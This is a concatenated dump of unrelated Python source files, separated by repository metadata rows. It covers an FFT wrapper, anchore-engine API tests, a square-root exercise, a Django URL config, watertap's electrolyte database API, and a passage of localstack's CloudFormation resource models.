import numpy as np
from warnings import warn
realized = False
if not realized:
# try to use FFT3 if available, else use numpy.fftpack
try:
import fftw3
except ImportError:
fftw3 = None
try:
import fftw3f
except ImportError:
fftw3f = None
if fftw3 is not None:
# fftw3 methods
class fftpool:
def __init__(self, measure, dtype=float):
self.measure = measure
self.dtype = np.dtype(dtype)
dtsz = self.dtype.itemsize
if dtsz == 4:
self.tpfloat = np.float32
self.tpcplx = np.complex64
self.fftw = fftw3f
elif dtsz == 8:
self.tpfloat = np.float64
self.tpcplx = np.complex128
self.fftw = fftw3
else:
raise TypeError("nsgt.fftpool: dtype '%s' not supported"%repr(self.dtype))
self.pool = {}
def __call__(self, x, outn=None, ref=False):
lx = len(x)
try:
transform = self.pool[lx]
except KeyError:
transform = self.init(lx, measure=self.measure, outn=outn)
self.pool[lx] = transform
plan,pre,post = transform
if pre is not None:
x = pre(x)
plan.inarray[:] = x
plan()
if not ref:
tx = plan.outarray.copy()
else:
tx = plan.outarray
if post is not None:
tx = post(tx)
return tx
class fftp(fftpool):
def __init__(self, measure=False, dtype=float):
fftpool.__init__(self, measure, dtype=dtype)
def init(self, n, measure, outn):
inp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
outp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
plan = self.fftw.Plan(inp, outp, direction='forward', flags=('measure' if measure else 'estimate',))
return (plan,None,None)
class rfftp(fftpool):
def __init__(self, measure=False, dtype=float):
fftpool.__init__(self, measure, dtype=dtype)
def init(self, n, measure, outn):
inp = self.fftw.create_aligned_array(n, dtype=self.tpfloat)
outp = self.fftw.create_aligned_array(n//2+1, dtype=self.tpcplx)
plan = self.fftw.Plan(inp, outp, direction='forward', realtypes='halfcomplex r2c',flags=('measure' if measure else 'estimate',))
return (plan,None,None)
class ifftp(fftpool):
def __init__(self, measure=False, dtype=float):
fftpool.__init__(self, measure, dtype=dtype)
def init(self, n, measure, outn):
inp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
outp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
plan = self.fftw.Plan(inp, outp, direction='backward', flags=('measure' if measure else 'estimate',))
return (plan,None,lambda x: x/len(x))
class irfftp(fftpool):
def __init__(self, measure=False, dtype=float):
fftpool.__init__(self, measure, dtype=dtype)
def init(self, n, measure, outn):
inp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
outp = self.fftw.create_aligned_array(outn if outn is not None else (n-1)*2, dtype=self.tpfloat)
plan = self.fftw.Plan(inp, outp, direction='backward', realtypes='halfcomplex c2r', flags=('measure' if measure else 'estimate',))
return (plan,lambda x: x[:n],lambda x: x/len(x))
realized = True
if not realized:
# fall back to numpy methods
warn("nsgt.fft falling back to numpy.fft")
class fftp:
def __init__(self, measure=False, dtype=float):
pass
def __call__(self,x, outn=None, ref=False):
return np.fft.fft(x)
class ifftp:
def __init__(self, measure=False, dtype=float):
pass
def __call__(self,x, outn=None, n=None, ref=False):
return np.fft.ifft(x,n=n)
class rfftp:
def __init__(self, measure=False, dtype=float):
pass
def __call__(self,x, outn=None, ref=False):
return np.fft.rfft(x)
class irfftp:
def __init__(self, measure=False, dtype=float):
pass
def __call__(self,x,outn=None,ref=False):
return np.fft.irfft(x,n=outn)
| 38.766917 | 146 | 0.547905 |
40806a6f629246748e283409d4b31145ef0a795c | 3,307 | py | Python | tests/functional/services/api/events/test_get.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
] | null | null | null | tests/functional/services/api/events/test_get.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
] | null | null | null | tests/functional/services/api/events/test_get.py | dspalmer99/anchore-engine | 8c61318be6fec5d767426fa4ccd98472cc85b5cd | [
"Apache-2.0"
] | null | null | null | from datetime import datetime, timedelta
import pytest
from tests.functional.services.api.conftest import USER_API_CONFS
from tests.functional.services.api.subscriptions import SUBSCRIPTION_TYPES
from tests.functional.services.utils.http_utils import http_get, APIResponse
SERVICES = ['analyzer', 'api', 'catalog', 'simpleq', 'policy-engine', 'rbac-authorizer', 'rbac-manager', 'reports',
'notifications', 'feeds']
def get_event_id_from_list_resp(list_resp):
return list_resp.get('results', {})[0].get('generated_uuid')
@pytest.mark.parametrize('api_conf', USER_API_CONFS)
class TestEventsAPIGetReturns200:
def test_list_events(self, api_conf):
resp = http_get(['events'], {'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
@pytest.mark.parametrize('source', SERVICES)
def test_list_events_with_source_servicename(self, api_conf, source):
resp = http_get(['events'], {'source_servicename': source, 'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
def test_list_events_with_source_servicename(self, api_conf):
resp = http_get(['events'], {'source_hostid': 'anchore-quickstart', 'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
@pytest.mark.parametrize('e_type', SUBSCRIPTION_TYPES)
def test_list_events_with_event_type(self, api_conf, e_type):
resp = http_get(['events'], {'event_type': e_type, 'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
@pytest.mark.parametrize('r_type', ['image_tag', 'imageDigest', 'repository'])
def test_list_events_with_resource_type(self, api_conf, r_type):
resp = http_get(['events'], {'resource_type': r_type, 'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
def test_list_events_with_resource_id(self, api_conf):
resp = http_get(['events'], {'resource_id': 'docker.io/alpine:latest', 'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
@pytest.mark.parametrize('level', ['INFO', 'ERROR'])
def test_list_events_with_level(self, api_conf, level):
resp = http_get(['events'], {'level': level, 'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
def test_list_events_with_since(self, api_conf):
five_min_ago = str(datetime.now() - timedelta(minutes=5))
resp = http_get(['events'], {'since': five_min_ago, 'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
def test_list_events_with_before(self, api_conf):
resp = http_get(['events'],
{'before': str(datetime.now()), 'page': 1, 'limit': 1},
config=api_conf)
assert resp == APIResponse(200)
def test_list_event_types(self, api_conf):
resp = http_get(['event_types'], config=api_conf)
assert resp == APIResponse(200)
def test_get_event_by_id(self, api_conf):
resp = http_get(['events'], {'page': 1, 'limit': 1}, config=api_conf)
assert resp == APIResponse(200)
event_id = get_event_id_from_list_resp(resp.body)
resp = http_get(['events', event_id], config=api_conf)
assert resp == APIResponse(200)
| 44.689189 | 119 | 0.670396 |
7a35c3fa34e5bd000e4106da71d97cc5e27560d5 | 739 | py | Python | Starter/Examples/06_def.py | MKarimi21/JADI-Python | b07b9ff93909cffd059aecbd91073398f7153da7 | [
"MIT"
] | 2 | 2020-09-08T20:41:55.000Z | 2021-09-09T10:25:04.000Z | Starter/Examples/06_def.py | MKarimi21/JADI-Python | b07b9ff93909cffd059aecbd91073398f7153da7 | [
"MIT"
] | null | null | null | Starter/Examples/06_def.py | MKarimi21/JADI-Python | b07b9ff93909cffd059aecbd91073398f7153da7 | [
"MIT"
] | null | null | null | # a program to calculate the square root with def
# Babylian Algorithm for Square
def Square(Number):
error = 0.001
guess = abs(Number / 2)
iteraion = 0
if Number <= 0:
Number = abs(Number)
print('Your Number is incorrect and agian run program whith abslute number')
else:
while (abs(Number-guess**2) > error):
iteraion = iteraion + 1
print('-> on iteration', iteraion, 'my guess is', guess)
tqs = Number / guess
guess = (tqs + guess) / 2
Number = float(input('Give me N, I whill give you the Square(N) : '))
print('Your Number is = ', Number)
Square(Number)
Num2 = Number**2
print('Your Number ^2 is = ', Num2 )
Square(Number**2)
| 28.423077 | 84 | 0.592693 |
75851a61b331d51b7ded05e4e6bea37bc92f18f3 | 1,221 | py | Python | Yoga/Yoga/urls.py | cmadisonne/passion-project | ca9943d6d27e879a03e308b8ddb6e5d2eb89673b | [
"Apache-2.0"
] | null | null | null | Yoga/Yoga/urls.py | cmadisonne/passion-project | ca9943d6d27e879a03e308b8ddb6e5d2eb89673b | [
"Apache-2.0"
] | null | null | null | Yoga/Yoga/urls.py | cmadisonne/passion-project | ca9943d6d27e879a03e308b8ddb6e5d2eb89673b | [
"Apache-2.0"
] | null | null | null | """Yoga URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from YogaApp import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.base, name='home'),
path('about/', views.about, name='about'),
path('schedule/', views.schedule, name='schedule'),
path('community/', views.community, name='community'),
path('contact/', views.contact, name='contact'),
path('request/', views.request, name='request'),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| 39.387097 | 77 | 0.707617 |
4fe5688468b28df63b8379eebaca22b60d928d47 | 19,120 | py | Python | watertap/edb/db_api.py | jalving/watertap | a89bd61deaaca9c30402727545e8223a276c93e6 | [
"BSD-3-Clause-LBNL"
] | null | null | null | watertap/edb/db_api.py | jalving/watertap | a89bd61deaaca9c30402727545e8223a276c93e6 | [
"BSD-3-Clause-LBNL"
] | null | null | null | watertap/edb/db_api.py | jalving/watertap | a89bd61deaaca9c30402727545e8223a276c93e6 | [
"BSD-3-Clause-LBNL"
] | null | null | null | ###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
"""
Database operations API
"""
# stdlib
import logging
import re
from typing import Dict, List, Optional, Union
# third-party
try:
import certifi
except ImportError:
certifi = None
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure, ServerSelectionTimeoutError, PyMongoError
# package
from .data_model import Result, Component, Reaction, Base, DataWrapper
from .error import BadConfiguration
__author__ = "Dan Gunter (LBNL)"
_log = logging.getLogger(__name__)
class ElectrolyteDB:
"""Interface to the Electrolyte database.
This uses MongoDB as the underlying data store.
"""
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 27017
DEFAULT_URL = f"mongodb://{DEFAULT_HOST}:{DEFAULT_PORT}"
DEFAULT_DB = "electrolytedb"
# Default timeout, in ms, for sockets, connections, and server selection
timeout_ms = 5000
timeout_args = {
"socketTimeoutMS": timeout_ms,
"connectTimeoutMS": timeout_ms,
"serverSelectionTimeoutMS": timeout_ms,
}
# make sure these match lowercase names of the DataWrapper subclasses in
# the `data_model` module
_known_collections = ("base", "component", "reaction")
def __init__(
self,
url: str = DEFAULT_URL,
db: str = DEFAULT_DB,
check_connection: bool = True,
):
"""Constructor.
Args:
url: MongoDB server URL
db: MongoDB 'database' (namespace) to use
check_connection: If True, check immediately if we can connect to the
server at the provided url. Otherwise defer this check until the
first operation (at which point a stack trace may occur).
Raises:
pymongo.errors.ConnectionFailure: if check_connection is True,
and the connection fails
"""
self._mongoclient_connect_status = {"initial": "untried", "retry": "untried"}
self._client = self._mongoclient(url, check_connection, **self.timeout_args)
if self._client is None:
msg = self.connect_status_str
_log.error(msg)
raise ConnectionFailure(msg)
self._db = getattr(self._client, db)
self._db = getattr(self._client, db)
self._database_name = db
self._server_url = url
def is_empty(self) -> bool:
if self._database_name not in self._client.list_database_names():
return True
collections = set(self._db.list_collection_names())
if not collections:
return True
if not {"base", "component", "reaction"}.intersection(collections):
_log.warning(
"Bootstrapping into non-empty database, but without any EDB collections"
)
return True
return False
@staticmethod
def drop_database(url, db):
"""Drop a database.
Args:
url: MongoDB server URL
db: Database name
Returns:
None
Raises:
anything pymongo.MongoClient() can raise
"""
client = MongoClient(host=url)
client.drop_database(db)
@classmethod
def can_connect(cls, url=None, db=None) -> bool:
"""Convenience method to check if a connection can be made without having
to instantiate the database object.
Args:
url: Same as constructor
db: Same as constructor
Returns:
True, yes can connect; False: cannot connect
"""
url = url or f"mongodb://{cls.DEFAULT_HOST}:{cls.DEFAULT_PORT}"
db = db or cls.DEFAULT_DB
result = True
try:
_ = cls(url=url, db=db, check_connection=True)
except ConnectionFailure:
result = False
return result
def _client_can_connect(self, client: MongoClient) -> bool:
# NOTE the "ping" command is chosen because it's the only one available when using mocked MongoClient instances
# therefore, having a single commands that works for both mock- and non-mock objects makes the mocking easier
server_resp = client.admin.command("ping")
try:
return bool(server_resp["ok"])
except (KeyError, TypeError) as e:
_log.exception(f"Unexpected format for server response: {server_resp}")
return None
def _mongoclient(self, url: str, check, **client_kw) -> Union[MongoClient, None]:
_log.debug(f"Begin: Create MongoDB client. url={url}")
mc = MongoClient(url, **client_kw)
if not check:
_log.info(f"Skipping connection check for MongoDB client. url={url}")
_log.debug(f"End: Create MongoDB client. url={url}")
return mc
# check that client actually works
_log.info(f"Connection check MongoDB client url={url}")
try:
if self._client_can_connect(mc):
self._mongoclient_connect_status["initial"] = "ok"
_log.info("MongoDB connection succeeded")
except ConnectionFailure as conn_err:
mc = None
self._mongoclient_connect_status["initial"] = str(conn_err)
if "CERTIFICATE_VERIFY_FAILED" in str(conn_err):
_log.warning(f"MongoDB connection failed due to certificate "
f"verification.")
if certifi is not None:
_log.info("Retrying MongoDB connection with explicit location "
f"for client certificates ({certifi.where()})")
try:
mc = MongoClient(url, tlsCAFile=certifi.where(), **client_kw)
if self._client_can_connect(mc):
_log.info("Retried MongoDB connection succeeded")
except ConnectionFailure as err:
mc = None
self._mongoclient_connect_status["retry"] = str(err)
_log.error(self.connect_status_str)
_log.debug(f"End: Create MongoDB client. url={url}")
return mc
@property
def connect_status(self) -> Dict:
return self._mongoclient_connect_status.copy()
@property
def connect_status_str(self) -> str:
e = self._mongoclient_connect_status
if e["initial"] == "ok":
return "Connection succeeded"
if e["retry"] == "ok":
return "Initial connection failed, but retry succeeded"
return f"Initial connection error ({e['initial']}), retry error ({e['retry']})"
@property
def database(self):
return self._database_name
@property
def url(self):
return self._server_url
def get_components(
self,
component_names: Optional[List[str]] = None,
element_names: Optional[List[str]] = None,
) -> Result:
"""Get thermodynamic information for components of reactions.
Args:
component_names: List of component names
element_names: List of element names (ignored if component_names is given)
Returns:
All components matching the criteria (or all if none specified)
"""
collection = self._db.component
if component_names:
query = {"$or": [{"name": n} for n in component_names]}
_log.debug(f"get_components. components={component_names} query={query}")
it = collection.find(filter=query)
elif element_names:
elt_set, elt_list = set(element_names), list(element_names)
# Find all components with at least one of the specified elements,
# then filter results to include only components where the elements
# are a subset of the specified elements (i.e., no 'other' elements).
it = (
doc
for doc in collection.find({"elements": {"$in": elt_list}})
if set(doc["elements"]) <= elt_set
)
else:
_log.debug(f"get_components. get all components (empty query)")
it = collection.find(filter={})
result = Result(iterator=it, item_class=Component)
return result
def get_reactions(
self,
component_names: Optional[List] = None,
phases: Union[List[str], str] = None,
any_components: bool = False,
include_new_components: bool = False,
reaction_names: Optional[List] = None,
) -> Result:
"""Get reaction information.
Args:
component_names: List of component names
phases: Phase(s) to include; if not given allow any.
any_components: If False, the default, only return reactions where
one side of the reaction has all components provided.
If true, return the (potentially larger) set of reactions where
any of the components listed are present.
include_new_components: If False, the default, only return reactions where
all given components are found in that reaction (and no new components)
are used in that reaction.
reaction_names: List of reaction names instead of component names
Returns:
All reactions containing any of the names (or all reactions,
if not specified)
"""
collection = self._db.reaction
if component_names:
found = []
if phases is None:
allow_phases = None
elif isinstance(phases, str):
allow_phases = {phases}
else:
allow_phases = set(phases)
# build a set of normalized component names
cnames = {c.replace(" ", "_") for c in component_names}
_log.debug(
f"Get reaction with {'any' if any_components else 'all'} "
f"components {cnames}"
)
# Brute force table scan: need to restructure DB for this to be
# easy to do with a MongoDB query, i.e. need to put all the
# *keys* for stoichiometry.Liq as *values* in an array, then do a:
# {$not: {$elemMatch: { $nin: [<components>] } } } on that array
stoich_field = Reaction.NAMES.stoich
for item in collection.find():
stoich = {}
disallow = False
for phase in item[stoich_field].keys():
if allow_phases is not None and phase not in allow_phases:
disallow = True
for n in item[stoich_field][phase]:
stoich[n] = item[stoich_field][phase][n]
#If the item involves a phase that is not allowed, then move on to next item
if (disallow):
continue
#If stoich is empty, then move on to next item
if (stoich == {}):
continue
if any_components:
# look for non-empty intersection
if set(stoich.keys()) & cnames:
found.append(item)
else:
# ok if it matches both sides
if set(stoich.keys()) == cnames:
found.append(item)
# also ok if it matches everything on one side
else:
# Add a reaction if all the products/reactants
# can be formed. This allows addition of reactions
# that may include species not yet considered.
if (include_new_components == True):
for side in -1, 1:
side_keys = (k for k, v in stoich.items() if abs(v)/v == side)
if set(side_keys).issubset(cnames):
found.append(item)
break # found; stop
# Otherwise, only include reactions that are subsets of
# the given component list
else:
if set(stoich.keys()).issubset(cnames):
found.append(item)
it = iter(found)
elif reaction_names:
query = {"name": {"$in": reaction_names}}
_log.debug(f"reaction query: {query}")
it = collection.find(filter=query)
else:
it = collection.find()
return Result(iterator=it, item_class=Reaction)
def get_base(self, name: str = None) -> Union[Result, Base]:
"""Get base information by name of its type.
Args:
name: Name of the base type.
Returns:
If no name is given, a Result iterator over all the bases.
Otherwise, a single `Base` object.
"""
if name:
query = {"name": name}
else:
query = {}
collection = self._db.base
result = Result(iterator=collection.find(filter=query), item_class=Base)
if name:
try:
return list(result)[0]
except IndexError:
raise IndexError("No bases found in DB")
else:
return result
def list_bases(self):
"""List the currently loaded bases and provide brief description
Args:
None
Returns:
No return, just display info to console
"""
for item in self.get_base():
print(f"base name: {item.name}\t\tdescription -> {self._base_desc(item.name)}")
def _base_desc(self, name) -> str:
"""Creates a description of a base based on the standard naming
Args:
name: Name of the base to describe
Returns:
desc: String of the description of the base
"""
if name == "default_thermo":
desc = "ThermoConfig: Default uses FTPx state vars for Liq phase"
elif name == "reaction":
desc = "ReactionConfig: Blank reaction template"
else:
items = name.split("_")
if len(items) < 3:
raise BadConfiguration("ElectrolyteDB._base_desc", self.get_base(name).idaes_config,
missing=None,why="\nName of base ("+name+") is of unknown format\n")
if items[0] == "thermo":
desc = "ThermoConfig: "
else:
desc = "ReactionConfig: "
desc += "uses " + items[-1] + " state vars for "
for i in range(1,len(items)-1):
desc += items[i] + ","
desc += " phases"
return desc
# older method name
get_one_base = get_base
def load(
self,
data: Union[Dict, List[Dict], DataWrapper, List[DataWrapper]],
rec_type: str = "base",
) -> int:
"""Load a single record or list of records.
Args:
data: Data to load, as a single or list of dictionaries or :class:`DataWrapper` subclass
rec_type: If input is a dict, the type of record. This argument is ignored if the input is
a subclass of DataWrapper.
Returns:
Number of records loaded
"""
is_object = False
if isinstance(data, DataWrapper):
data = [data]
is_object = True
elif isinstance(data, dict):
data = [data]
else:
is_object = isinstance(data[0], DataWrapper)
if is_object:
rec_type = data[0].__class__.__name__.lower()
else:
assert rec_type in self._known_collections
num = 0
for item in data:
coll = getattr(self._db, rec_type)
record = item.json_data if is_object else item
coll.insert_one(self.preprocess_record(record, rec_type))
num += 1
return num
# XXX: This preprocessing overlaps with data_model.DataWrapper subclasses.
# XXX: It should all be moved to one place
@classmethod
def preprocess_record(cls, record, rec_type):
process_func = getattr(cls, f"_process_{rec_type}")
return process_func(record)
@staticmethod
def _process_component(rec):
rec["elements"] = get_elements_from_components([rec["name"]])
return rec
@staticmethod
def _process_reaction(rec):
rec["reactant_elements"] = get_elements_from_components(
rec.get("components", []))
# If reaction_order is not present in parameters, create it by
# copying the stoichiometry (or empty for each phase, if stoich. not found)
if Reaction.NAMES.param in rec:
param = rec[Reaction.NAMES.param]
if Reaction.NAMES.reaction_order not in param:
if Reaction.NAMES.stoich in rec:
param[Reaction.NAMES.reaction_order] = rec[
Reaction.NAMES.stoich].copy()
else:
param[Reaction.NAMES.reaction_order] = {
phase: {} for phase in Reaction.PHASES
}
return rec
@staticmethod
def _process_base(rec):
return rec
@staticmethod
def _process_species(s):
"""Make species match https://jess.murdoch.edu.au/jess_spcdoc.shtml"""
m = re.match(r"([a-zA-Z0-9]+)\s*(\d*[\-+])?", s)
if m is None:
raise ValueError(f"Bad species: {s}")
symbols, input_charge = m.groups()
if input_charge is None:
charge = ""
elif len(input_charge) > 1:
# make 2+ -> +2
num = input_charge[:-1]
sign = input_charge[-1]
charge = f"{sign}{num}"
else:
charge = input_charge
# print(f"{s} -> {symbols}{charge}")
return f"{symbols}{charge}"
def get_elements_from_components(components):
elements = set()
for comp in components:
# print(f"Get elements from: {comp}")
for m in re.finditer(r"[A-Z][a-z]?", comp):
element = comp[m.start() : m.end()]
if element[0] == "K" and len(element) > 1:
pass
else:
elements.add(element)
return list(elements)
| 38.011928 | 119 | 0.565638 |
d6545145fc977d8eb294213f2c7fa32f42db76f5 | 67,845 | py | Python | localstack/services/cloudformation/service_models.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | localstack/services/cloudformation/service_models.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | localstack/services/cloudformation/service_models.py | yongliu-mdsol/localstack | 306daff632c0add548bfc3498ba71866ca281ff5 | [
"Apache-2.0"
] | null | null | null | import re
import json
import logging
from moto.ec2.utils import generate_route_id
from moto.s3.models import FakeBucket
from moto.sqs.models import Queue as MotoQueue
from moto.iam.models import Role as MotoRole
from moto.core.models import CloudFormationModel
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
from localstack.constants import AWS_REGION_US_EAST_1, LOCALHOST
from localstack.utils.aws import aws_stack
from localstack.utils.common import camel_to_snake_case, select_attributes
from localstack.services.cloudformation.deployment_utils import (
PLACEHOLDER_RESOURCE_NAME, remove_none_values, params_list_to_dict, lambda_keys_to_lower,
merge_parameters, params_dict_to_list, select_parameters, params_select_attributes)
LOG = logging.getLogger(__name__)
# name pattern of IAM policies associated with Lambda functions
LAMBDA_POLICY_NAME_PATTERN = 'lambda_policy_%s'
# ref attribute definitions
REF_ATTRS = ['PhysicalResourceId', 'Ref']
REF_ID_ATTRS = REF_ATTRS + ['Id']
REF_ARN_ATTRS = ['Ref', 'Arn']
class DependencyNotYetSatisfied(Exception):
""" Exception indicating that a resource dependency is not (yet) deployed/available. """
def __init__(self, resource_ids, message=None):
message = message or 'Unresolved dependencies: %s' % resource_ids
super(DependencyNotYetSatisfied, self).__init__(message)
resource_ids = resource_ids if isinstance(resource_ids, list) else [resource_ids]
self.resource_ids = resource_ids
class GenericBaseModel(CloudFormationModel):
""" Abstract base class representing a resource model class in LocalStack.
This class keeps references to a combination of (1) the CF resource
properties (as defined in the template), and (2) the current deployment
state of a resource.
Concrete subclasses will implement convenience methods to manage resources,
e.g., fetching the latest deployment state, getting the resource name, etc.
"""
def __init__(self, resource_json, region_name=None, **params):
self.region_name = region_name or aws_stack.get_region()
self.resource_json = resource_json
self.resource_type = resource_json['Type']
# Properties, as defined in the resource template
self.properties = resource_json.get('Properties') or {}
# State, as determined from the deployed resource; use a special dict key here to keep
# track of state changes within resource_json (this way we encapsulate all state details
# in `resource_json` and the changes will survive creation of multiple instances of this class)
self.state = resource_json['_state_'] = resource_json.get('_state_') or {}
# ----------------------
# ABSTRACT BASE METHODS
# ----------------------
def get_resource_name(self):
""" Return the name of this resource, based on its properties (to be overwritten by subclasses) """
return None
def get_physical_resource_id(self, attribute=None, **kwargs):
""" Determine the physical resource ID (Ref) of this resource (to be overwritten by subclasses) """
return None
# TODO: change the signature to pass in a Stack instance (instead of stack_name and resources)
def fetch_state(self, stack_name, resources):
""" Fetch the latest deployment state of this resource, or return None if not currently deployed. """
return None
# TODO: change the signature to pass in a Stack instance (instead of stack_name and resources)
def update_resource(self, new_resource, stack_name, resources):
""" Update the deployment of this resource, using the updated properties (implemented by subclasses). """
# TODO: evaluate if we can add a generic implementation here, using "update" parameters from
# get_deploy_templates() responses, and based on checking whether resource attributes have changed
pass
@classmethod
def cloudformation_type(cls):
""" Return the CloudFormation resource type name, e.g., "AWS::S3::Bucket" (implemented by subclasses). """
return super(GenericBaseModel, cls).cloudformation_type()
@staticmethod
def get_deploy_templates():
""" Return template configurations used to create the final API requests (implemented by subclasses). """
pass
# ----------------------
# GENERIC BASE METHODS
# ----------------------
def get_cfn_attribute(self, attribute_name):
""" Retrieve the given CF attribute for this resource (inherited from moto's CloudFormationModel) """
if attribute_name in REF_ARN_ATTRS and hasattr(self, 'arn'):
return self.arn
if attribute_name in REF_ATTRS:
result = self.get_physical_resource_id(attribute=attribute_name)
if result:
return result
props = self.props
if attribute_name in props:
return props.get(attribute_name)
raise UnformattedGetAttTemplateException()
# ----------------------
# GENERIC UTIL METHODS
# ----------------------
def fetch_and_update_state(self, *args, **kwargs):
from localstack.utils.cloudformation import template_deployer
try:
state = self.fetch_state(*args, **kwargs)
self.update_state(state)
return state
except Exception as e:
if not template_deployer.check_not_found_exception(e, self.resource_type, self.properties):
LOG.debug('Unable to fetch state for resource %s: %s' % (self, e))
def fetch_state_if_missing(self, *args, **kwargs):
if not self.state:
self.fetch_and_update_state(*args, **kwargs)
return self.state
def set_resource_state(self, state):
""" Set the deployment state of this resource. """
self.state = state or {}
def update_state(self, details):
""" Update the deployment state of this resource (existing attributes will be overwritten). """
details = details or {}
self.state.update(details)
return self.props
@property
def physical_resource_id(self):
""" Return the (cached) physical resource ID. """
return self.resource_json.get('PhysicalResourceId')
@property
def logical_resource_id(self):
""" Return the logical resource ID. """
return self.resource_json.get('LogicalResourceId')
@property
def props(self):
""" Return a copy of (1) the resource properties (from the template), combined with
(2) the current deployment state properties of the resource. """
result = dict(self.properties)
result.update(self.state or {})
return result
@property
def resource_id(self):
""" Return the logical resource ID of this resource (i.e., the ref. name within the stack's resources). """
return self.resource_json['LogicalResourceId']
@classmethod
def update_from_cloudformation_json(cls,
original_resource, new_resource_name, cloudformation_json, region_name):
props = cloudformation_json.get('Properties', {})
for key, val in props.items():
snake_key = camel_to_snake_case(key)
lower_key = key.lower()
for candidate in [key, lower_key, snake_key]:
if hasattr(original_resource, candidate) or candidate == snake_key:
setattr(original_resource, candidate, val)
break
return original_resource
@classmethod
def create_from_cloudformation_json(cls, resource_name, resource_json, region_name):
return cls(resource_name=resource_name, resource_json=resource_json, region_name=region_name)
@classmethod
def resolve_refs_recursively(cls, stack_name, value, resources):
# TODO: restructure code to avoid circular import here
from localstack.utils.cloudformation.template_deployer import resolve_refs_recursively
return resolve_refs_recursively(stack_name, value, resources)
class EventsRule(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Events::Rule'
def get_cfn_attribute(self, attribute_name):
if attribute_name == 'Arn':
return self.params.get('Arn') or aws_stack.events_rule_arn(self.params.get('Name'))
return super(EventsRule, self).get_cfn_attribute(attribute_name)
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('Name')
def fetch_state(self, stack_name, resources):
rule_name = self.resolve_refs_recursively(stack_name, self.props.get('Name'), resources)
result = aws_stack.connect_to_service('events').describe_rule(Name=rule_name) or {}
return result if result.get('Name') else None
class EventBus(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Events::EventBus'
def fetch_state(self, stack_name, resources):
event_bus_arn = self.physical_resource_id
if not event_bus_arn:
return None
client = aws_stack.connect_to_service('events')
return client.describe_event_bus(Name=event_bus_arn.split('/')[1])
class LogsLogGroup(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Logs::LogGroup'
def get_cfn_attribute(self, attribute_name):
if attribute_name == 'Arn':
return self.params.get('Arn') or aws_stack.log_group_arn(self.params.get('LogGroupName'))
return super(LogsLogGroup, self).get_cfn_attribute(attribute_name)
def fetch_state(self, stack_name, resources):
group_name = self.props.get('LogGroupName')
group_name = self.resolve_refs_recursively(stack_name, group_name, resources)
logs = aws_stack.connect_to_service('logs')
groups = logs.describe_log_groups(logGroupNamePrefix=group_name)['logGroups']
return ([g for g in groups if g['logGroupName'] == group_name] or [None])[0]
class CloudFormationStack(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::CloudFormation::Stack'
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('StackId')
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('cloudformation')
child_stack_name = self.props['StackName']
child_stack_name = self.resolve_refs_recursively(stack_name, child_stack_name, resources)
result = client.describe_stacks(StackName=child_stack_name)
result = (result.get('Stacks') or [None])[0]
return result
@classmethod
def get_deploy_templates(cls):
def get_nested_stack_params(params, **kwargs):
nested_stack_name = params['StackName']
stack_params = params.get('Parameters', {})
stack_params = [{'ParameterKey': k, 'ParameterValue': str(v).lower() if isinstance(v, bool) else str(v)}
for k, v in stack_params.items()]
result = {
'StackName': nested_stack_name,
'TemplateURL': params.get('TemplateURL'),
'Parameters': stack_params
}
return result
return {
'create': {
'function': 'create_stack',
'parameters': get_nested_stack_params
}
}
class LambdaFunction(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::Function'
def fetch_state(self, stack_name, resources):
func_name = self.resolve_refs_recursively(stack_name, self.props['FunctionName'], resources)
return aws_stack.connect_to_service('lambda').get_function(FunctionName=func_name)
def get_physical_resource_id(self, attribute=None, **kwargs):
func_name = self.props.get('FunctionName')
if attribute == 'Arn':
return aws_stack.lambda_function_arn(func_name)
return func_name
def update_resource(self, new_resource, stack_name, resources):
props = new_resource['Properties']
